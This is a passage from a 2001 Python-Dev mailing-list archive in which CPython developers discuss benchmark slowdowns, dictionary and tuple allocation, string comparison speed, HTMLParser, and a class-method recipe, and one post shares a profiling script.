 > usually not altered after creation ;-)

  The slots of tuples are already allocated inline, so I don't think
they'll get much better.  ;-)


-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Fri May 18 17:27:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:27:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200."
             <20010518170021.B16811@xs4all.nl> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>  
            <20010518170021.B16811@xs4all.nl> 
Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>

> > (I guess he means the buffer is alloc'ed contiguously with the dict
> > object head.  That's often a nice strategy.  Could do that for small
> > lists too maybe, except those haven't gotten anybody's attention just
> > yet.)
> 
> Sounds to me like it would benifit tuples even more than lists or dicts. At
> least in my code, I see more short tuples than short lists, and they are
> usually not altered after creation ;-)

Which is why tuples already have this feature.

Posted before your first cup of coffee? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Fri May 18 17:36:39 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 18 May 2001 17:36:39 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid>

guido wrote:
> A much improved HTML parser -- a replacement for sgmllib.  The API is
> derived from but not quite compatible with that of sgmllib, so it's a
> new file.  I suppose it needs documentation, and htmllib needs to be
> changed to use this instead of sgmllib, and sgmllib needs to be
> declared obsolete.

any reason this cannot be made compatible with sgmllib?

Cheers /F


From thomas at xs4all.net  Fri May 18 17:36:42 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:36:42 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com>
Message-ID: <20010518173642.S16791@xs4all.nl>

On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote:
> > > (I guess he means the buffer is alloc'ed contiguously with the dict
> > > object head.  That's often a nice strategy.  Could do that for small
> > > lists too maybe, except those haven't gotten anybody's attention just
> > > yet.)
> > 
> > Sounds to me like it would benifit tuples even more than lists or dicts. At
> > least in my code, I see more short tuples than short lists, and they are
> > usually not altered after creation ;-)
> 
> Which is why tuples already have this feature.
> 
> Posted before your first cup of coffee? :-)

No, after my last meeting, before my first witbier of the
friday-afternoon-office-beer-binge :) TGIF ;)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido at digicool.com  Fri May 18 17:49:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:49:25 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200."
             <004401c0dfb0$57b7df00$e46940d5@hagrid> 
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>  
            <004401c0dfb0$57b7df00$e46940d5@hagrid> 
Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com>

> guido wrote:
> > A much improved HTML parser -- a replacement for sgmllib.  The API is
> > derived from but not quite compatible with that of sgmllib, so it's a
> > new file.  I suppose it needs documentation, and htmllib needs to be
> > changed to use this instead of sgmllib, and sgmllib needs to be
> > declared obsolete.
> 
> any reason this cannot be made compatible with sgmllib?

The sgmllib API design has a few real bogosities.  I can't recall what
they were, but we looked into keeping it compatible, and it wasn't
worth the pain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May 18 18:57:34 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 12:57:34 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200."
             <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>  
            <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com>

> According to the CVS log, this implementation of do_cmp was installed
> in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
> rationale for doing do_cmp in that order?

You can ask me directly, loewis. :-)

I believe that my thinking at the time was that tp_compare should only
be used as a final fallback, just before comparing by address.  This
was consistent with my desire to completely get rid of tp_compare.

But until that is done, I now agree that it makes more sense to try
tp_compare first when a three-way-compare is requested -- especially
in the light of sequence comparison.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 19:37:33 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 10:37:33 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <20010518103733.A22185@glacier.fnational.com>

M.-A. Lemburg wrote:
> FYI, I have a patch which inlines small dictionaries directly
> into the type object (rather than usin malloc to allocate
> the slot buffer).

Would it be faster to inline an association table rather than a
hash table?

 Neil


From guido at digicool.com  Fri May 18 19:43:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 13:43:45 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT."
             <20010518103733.A22185@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>  
            <20010518103733.A22185@glacier.fnational.com> 
Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>

> Would it be faster to inline an association table rather than a
> hash table?

What's an association table?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 20:15:59 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 11:15:59 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
Message-ID: <20010518111559.A22344@glacier.fnational.com>

Guido van Rossum wrote:
> What's an association table?

A table of keys and values.  Values are looked up by looping over
the table comparing each key until the correct one is found (ie.
its O(n) where n is the size of the table).  For Python, the cost
of doing compares probably outweighs the cost of doing the
hashing, even for small tables.

Its not clear to me though if it would be a win.  Assuming that
interned strings are the most common key, a assocation table with
four entries would take on average two pointer compares to look
up a value.

  Neil


From mal at lemburg.com  Fri May 18 20:15:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 20:15:37 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B0566C9.90F17DB1@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

There you go:

https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470
 
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 18 20:23:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 14:23:55 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT."
             <20010518111559.A22344@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>  
            <20010518111559.A22344@glacier.fnational.com> 
Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > What's an association table?
> 
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (ie.
> its O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.
> 
> Its not clear to me though if it would be a win.  Assuming that
> interned strings are the most common key, a assocation table with
> four entries would take on average two pointer compares to look
> up a value.
> 
>   Neil

I see.  At the cost of yet another algorithm, of course.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From James_Althoff at i2.com  Fri May 18 21:10:11 2001
From: James_Althoff at i2.com (James_Althoff at i2.com)
Date: Fri, 18 May 2001 12:10:11 -0700
Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods)
Message-ID: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>

Python-dev'ers,

Pardon the intrusion, but Aahz Maruch suggested that I post this to the
python-dev list.  The message below illustrates "yet another class method
recipe" that Costas synthesized (and which I then modified very slightly)
from various posts following another discussion on python-list about class
methods (as we all await the "type/class healing" stuff some of you are
working on -- go team!).  This variant uses explicit "metaclasses" (defined
as regular classes) whose instances ("meta objects") point to class objects
(since they cannot *be* class objects in current Python).   Anyway, I think
the approach has some nice properties.

Best regards,

Jim


----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM -----
                                                                                                               
                    James Althoff                                                                              
                                         To:     python-list at python.org                                        
                    05/14/01 02:09       cc:                                                                   
                    PM                   Subject:     Re: Simulating Class (was Re: Does Python have Class     
                                         methods)(Document link: James Althoff)                                
                                                                                                               

Costas writes:
>Ok, so after looking thru how Python works and comments from people, I
>came up with what I believe may be the best way to implement Class
>methods and Class variables.
>
><snip>
>
>Costas

I think this idea is quite good.  I would amend it very slightly by
suggesting the convention of defining *three* separate names in the
enclosing module:

1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class

To support this, I would propose using a naming convention as below.

If one is interested in defining a class Spam, then use the following
names:

1) SpamMetaClass  -- names the enclosing class
2) SpamMeta  --  names a singleton instance of the enclosing class
3) Spam  --  names the enclosed class

Use the name SpamMetaClass when you need to derive a subclass of
SpamMetaClass, e.g.,

class SpecialSpamMetaClass(SpamMetaClass): pass

Use the name SpamMeta to invoke a class method, e.g.,

SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

s = Spam()

(and to derive a subclass of Spam).

Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby
-- that is to say, the class Spam is not an instance of SpamMetaClass --
nonetheless, SpamMetaClass still acts as a "higher level" class that
provides methods on behalf of the class Spam where said methods are 1)
independent of any particular instance of Spam and 2) allow for
factory-method-style creation of Spam instances -- these being two very
important attributes of the metaclass concept.  Plus "meta" is a nice,
short name.  :-)   Plus using "MetaClass" to refer to the class and "Meta"
to refer to the singleton instance of "MetaClass" is reasonably clear and
succinct, I think.

One nice thing about the proposed recipe is that the SpamMeta object is a
real class instance of a real class.  This means that -- unlike when using
the "module function" recipe -- we get inheritance of methods, and --
unlike when using the "callable wrapper class" recipe -- we also get
override of methods.

The example below illustrates both of these important capabilities.


class Class1MetaClass:  # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self):  # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3):  # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1:  # Base class

        def whoami(self):
            print 'Class1.whoami:', self


Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass
instance
Class1 = Class1Meta.Class1  # Make the Class1 name accessible


class Class2MetaClass(Class1MetaClass):  # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self):  # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1):  # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()  # Make & name the singleton metaclass
instance
Class2 = Class2Meta.Class2  # Make the Class2 name accessible


# Test

Class1Meta.whoami()  # invoke "class method" of base class
Class2Meta.whoami()  # invoke "class method" of derived class

Class1().whoami()  # make an instance & invoke "instance method"
Class2().whoami()

print Class1Meta.newList()  # factory method
print Class2Meta.newList()  # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami: <meta6.Class1MetaClass instance at 00810DBC>
Class2MetaClass.whoami: <meta6.Class2MetaClass instance at 00812D6C>
Class1.whoami: <meta6.Class1 instance at 0081058C>
Class2.whoami: <meta6.Class2 instance at 0081058C>
[<meta6.Class1 instance at 0081147C>, <meta6.Class1 instance at 0081151C>,
<meta6.Class1 instance at
 0081009C>]
[<meta6.Class2 instance at 0081147C>, <meta6.Class2 instance at 00810CCC>,
<meta6.Class2 instance at
 0081009C>]
<module 'meta6' from 'c:\_dev\python20\meta6.py'>


Jim


From tim.one at home.com  Fri May 18 21:26:02 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:26:02 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B0509BF.A2F84A30@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBGKDAA.tim.one@home.com>

[MAL]
> It [pybench] doesn't claim "typical use". pybench is aimed at finding
> out performance issues about hot-spots -- there's no such thing as
> a "typical program", so pybench gives you low level performance
> compares for very specific tasks, e.g. dictionary creation or
> for-loop performance.
>
> I have found it to be rather successful at that. At least gives
> some good hints at where to look...

There must be a misunderstanding here.  I understand and appreciate all that!

From tim.one at home.com  Fri May 18 21:48:33 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:48:33 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518111559.A22344@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKDAA.tim.one@home.com>

[Neil Schemenauer]
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (ie.
> its O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.

I thought about that before.  The inlining appeals but the algorithm not
much:  the dict implementation *as is* loops over all the table entries too,
except that instead of starting with "i = 0" it starts (now) with "i = hash &
mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^=
poly"; and instead of giving up when "i >= length" it punts when finding an
entry with a null value.  Incrementing via ++i is certainly cheaper, except
that even when small, the hash table usually hits on the first try when the
key is present, so usually gets out before incrementing.

> Its not clear to me though if it would be a win.

Best guess is not.

> Assuming that interned strings are the most common key, a assocation
> table with four entries would take on average two pointer compares
> to look up a value.

Actually an average of 2.5 when the key is present and each key is equally
likely to be queried, and always 4 when the queried key is not present.  The
hash table has better expected stats on both counts, but needs 4 unused slots
too to achieve that.  The savings would be in memory for small dicts more
than in time (if at all).


From jeremy at alum.mit.edu  Fri May 18 23:07:37 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Fri, 18 May 2001 17:07:37 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
Message-ID: <200105182107.RAA16214@cliff.concentric.net>

I did some profiles of more of the pybench slowdowns this afternoon
and found a few causes for several problem benchmarks.

I just made a couple of small changes for BuiltinFunctionCalls.  The
problem here is that PyCFunction calls were optimized for flags == 0
and not flags == METH_VARARGS, which is more common.

The scary thing about BuiltinFunctinoCalls is that the profiler shows
it spending almost 30% of its time in PyArg_ParseTuple().  It
certainly is a shame that we have this complicated, slow run-time
parsing mechanism to deal with a static property of the code, namely
how many arguments it takes and whether their types are.

A few of the other tests, SimpleComplexArithmetic and
CreateStringsWithConcat, are slower because of the new coercion
logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
look at CreateStringsWithConcat in some detail.  The basic problem is
that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
PyNumber_Add("ab", "cd").  This function tries all sorts of different
ways to coerce the strings into addable numbers before giving up and
trying sequence concat.

It looks like the new coercion rules have optimized number ops at the
expense of string ops.  If you're writing programs with lots of
numbers, you probably think that's peachy.  If you're parsing HTML,
perhaps you don't :-).

I looked at the test suite to see how often it is called with
non-number arguments.  The answer is 77% of the time, but almost all
of those calls are from test_unicodedata.  If that one test is
excluded, the majority of the calls (~90%) are with numbers.  But the
majority of those calls just come from a few tests -- test_pow,
test_long, test_mutants, test_strftime.

If I were to do something about the coercions, I would see if there
was a way to quickly determine that PyNumber_Add() ain't gonna have
any luck.  Then we could bail to things like string_concat more
quickly.

I also looked at SmallLists.  It seems that the only significant
change since 1.5.2 is the garbage collection.  This tests spends a lot
more time deallocating lists than it used to, and the only change I
see in the code is the GC.  I assume, but haven't checked, that the
story is similar for SmallTuples.

So the primary things that have slowed down since 1.5.2 seem to be:
comparisons, coercion, and memory management for containers.  These
also seem to be the things that have improved the most in terms of
features, completeness, etc.  Looks like we need to revisit them and
sort out the performance issues.

Jeremy


From guido at digicool.com  Fri May 18 23:58:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 17:58:25 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT."
             <200105182107.RAA16214@cliff.concentric.net> 
References: <200105182107.RAA16214@cliff.concentric.net> 
Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>

> The scary thing about BuiltinFunctinoCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and whether their types are.

I would love to see a mechanism whereby the signature of a C function
could be stored as part of the static info about it, in an extension
of the PyMethodDef structure: this would serve as documentation, allow
for introspection, etc.  I'm sure Ping would love this for pydoc and
his inspect module.

But I'm not sure how much we can speed things up, unless we give up on
the tuple interface (an argc/argv API could be much faster since
usually the arguments are already on the frame's stack in this form).

> A few of the other tests, SimpleComplexArithmetic and
> CreateStringsWithConcat, are slower because of the new coercion
> logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
> look at CreateStringsWithConcat in some detail.  The basic problem is
> that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
> PyNumber_Add("ab", "cd").  This function tries all sorts of different
> ways to coerce the strings into addable numbers before giving up and
> trying sequence concat.
> 
> It looks like the new coercion rules have optimized number ops at the
> expense of string ops.  If you're writing programs with lots of
> numbers, you probably think that's peachy.  If you're parsing HTML,
> perhaps you don't :-).
> 
> I looked at the test suite to see how often it is called with
> non-number arguments.  The answer is 77% of the time, but almost all
> of those calls are from test_unicodedata.  If that one test is
> excluded, the majority of the calls (~90%) are with numbers.  But the
> majority of those calls just come from a few tests -- test_pow,
> test_long, test_mutants, test_strftime.
> 
> If I were to do something about the coercions, I would see if there
> was a way to quickly determine that PyNumber_Add() ain't gonna have
> any luck.  Then we could bail to things like string_concat more
> quickly.

There's already a special case for int+int in the BINARY_ADD opcode
(otherwise you would probably see more numbers).  Maybe another
special case for str+str would help here?

> I also looked at SmallLists.  It seems that the only significant
> change since 1.5.2 is the garbage collection.  This tests spends a lot
> more time deallocating lists than it used to, and the only change I
> see in the code is the GC.  I assume, but haven't checked, that the
> story is similar for SmallTuples.
> 
> So the primary things that have slowed down since 1.5.2 seem to be:
> comparisons, coercion, and memory management for containers.  These
> also seem to be the things that have improved the most in terms of
> features, completeness, etc.  Looks like we need to revisit them and
> sort out the performance issues.

Thanks for doing all this work, Jeremy!

I just hope that these performance hacks won't have to be redone when
I'm done with healing the types/class split.  I'm expecting that
things can become a lot simpler if everything inherits from Object,
sequences inherit from Sequence, and so on.  But since I'm currently
going slow on this work, I won't complain too much if the existing
code gets optimized first.  The stuff you already checked in looks
good!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Sat May 19 00:06:05 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Fri, 18 May 2001 18:06:05 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
References: <200105182107.RAA16214@cliff.concentric.net>
	<200105182158.QAA01250@cj20424-a.reston1.va.home.com>
Message-ID: <15109.40141.757071.770265@slothrop.digicool.com>

In case anyone else is interested, here are two quick pointers on
running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only): 
LDFLAGS="-pg" OPT="-pg" configure
make
When you run python it produces a gmon.out file.  To run gprof, pass
it the profile-enable executable and gmon.out.  It's spit out the
results on stdout.

2. Use this handy script (below) to run a single pybench test under
   the profiler and produce the output.

Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile('^([^:]+):(.*)')
rx_decl = re.compile('class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name

    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)

    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)

    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])


From jim at interet.com  Sat May 19 18:45:15 2001
From: jim at interet.com (James C. Ahlstrom)
Date: Sat, 19 May 2001 12:45:15 -0400
Subject: [Python-Dev] [off topic] Python is taking over the world
Message-ID: <3B06A31B.67A8D010@interet.com>

I was in my local (Sommerville, NJ) Borders book store
last week and noticed that they stocked many Python books,
most in multiple copies.  It all added up to three feet
of Python books.  Great.

The clincher was when I went to my YMCA, and saw that
someone had posted a flyer offering tutoring in Math,
Physics, Java and Python.

Congratulations to Guido and all on this list.

JimA


From guido at digicool.com  Sun May 20 01:18:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 19 May 2001 19:18:25 -0400
Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish
Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com>

For all you Douglas Adams fans out there:

    Douglas Noel Adams
       1952 - 2001

http://www.douglasadams.com

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sun May 20 11:31:25 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:31:25 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>

[M0artin v. Loewis]
> ...
> If I set tp_richcompare of strings to 0, I get past this code, and do
>
> 		c = (*f)(v, w);
> 		if (PyErr_Occurred())

Note that the usual way to write this is

 		if (c < 0 && PyErr_Occurred())

More work for my artificial "ab" < "cd" case but a net win in real life (when
c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
when c < 0 there's no way in the cmp protocol to use c's value alone to
distinguish between "less than" and "error").

> 			return NULL;
> 		return convert_3way_to_object(op, c);
>
> Here, I get 3 function calls: f is string_compare, then
> PyErr_Occurred, finally convert_3way_to_object, which converts
> {-1,0,1} x Op -> {Py_True, Py_False}.

Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

> Indeed, when I inline convert_3way_to_object, I get the same speed in
> both cases (with the remaining differences attributed to measurement
> and gcc doing register usage differently in both functions).

OK, understood, and thanks for following up!

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

In the absence of significant sorting, I agreed Py_EQ is most frequent.

> With a control flow like
>
> 		if (a->ob_size != b->ob_size)
>                    goto False;
>
> 		if (a->ob_size == 0)
>                    goto True;
>
> 		if (a->ob_sval[0] != b->ob_sval[0])
>                    goto False;
>
> 		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>                    goto False;
>                 else
>                    goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

		if (a->ob_size != b->ob_size
                || a->ob_sval[0] != b->ob_sval[0])
                    goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't
include the trailing null byte Python always sticks at the end of string
objects; and the first-byte check is much more likely to pay off than the
zero-length check (comparison to a null string?  gotta be rare as clear
conclusions <wink>), and better to test for the more common case first.


From tim.one at home.com  Sun May 20 11:54:08 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:54:08 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>

[Tim]
>> 1. String objects are also equal despite being different objects,
>>    if their ob_sinterned pointers are equal and non-NULL.  So if
>>    you're looking for every trick in & out of the book, that's
>>    another one.

[Martin v. Loewis]
> That does not help. In the entire test suite, there are 0 instances
> where strings are compared which are not identical, but have equal
> ob_sinterned pointers.

Good to know.  Had you tried this a few weeks ago, there would have been
thousands (it so happened that one-character strings weren't being interned
*effectively*, and there were lots of 1-character cases then where #1
applied; that's been fixed; good to know more aren't popping up).

> ...
> Whether there's a fruitless branch depends on your compiler.

A branch instruction is a branch instruction; I didn't distinguish between
taken and non-taken branches, as there's no uniformity in codegen across
platforms.

> With gcc 3, you can write
>
> 	if (__builtin_expect(a == b, 0)) {
>
> and then the body of the if block will be moved out of the way of
> linear control flow.

I don't think we'll be littering Python with compiler-specific hacks.  It's
good to get the less common case out-of-line, but it's not a pure win:  while
it reduces the penalty when the test doesn't pay, it also reduces the benefit
when it does pay (by the wildly architecture-dependent cost of taking a
mispredicted out-of-line branch, and the wildly compiler-dependent costs of
how seriously they take their own decisions or user hints to out-of-line a
block (e.g., the compiler may refetch everything from memory again at the
target if it thinks it's truly rare)).

>> Any idea where those 800,000 virgin calls to oldcomp are coming
>> from?  That's a lot.

> As far as I could trace it, most of them come from lookdict_string (at
> various locations inside this function).

Ah!  Of course.  string_compare is hardwired into lookdict_string.  This case
may be important enough to merit a distinct _PyString_Equal function, with
just the stuff lookdict_string needs (e.g., there's never a gain in testing
for pointer equality when called from lookdict_string because the dict code
already checked that; but there may be a gain for that test in an all-purpose
string_richcompare).

> ...
> So to support sorting better, I should special-case Py_LT in
> string_richcompare also, to avoid the function call ?-)

Of course.  string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE
anway, and that's most of the work for resolving all 6 possibilities.  Get
rid of string_compare entirely!

[on cmp sloth]
> Yes, that is a serious problem. Fortunately, very few calls in my
> programs go to string_compare through cmp() now. But then, your
> programs are different, of course...

There are search-tree modules I have but didn't write that do this; I don't
care enough about them to frustrate Guido's grand vision <wink>>

It may be more important for sequences other than 8-bit strings, as each call
to a comparison function for a pair of non-string sequences is very expensive
(involving more layers of calls for each element comparison).


From tim.one at home.com  Sun May 20 12:13:14 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 06:13:14 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.

If the time machine batteries can hold a full charge, you may want to go back
and add Py_CMP as a seventh possible desired-operation argument to tbe rich
comparison API.  My experience with dict comparisons was that
dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a
full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp
(potentially) compute cmp 3 times to fake one cmp.  But if dict richcmp knew
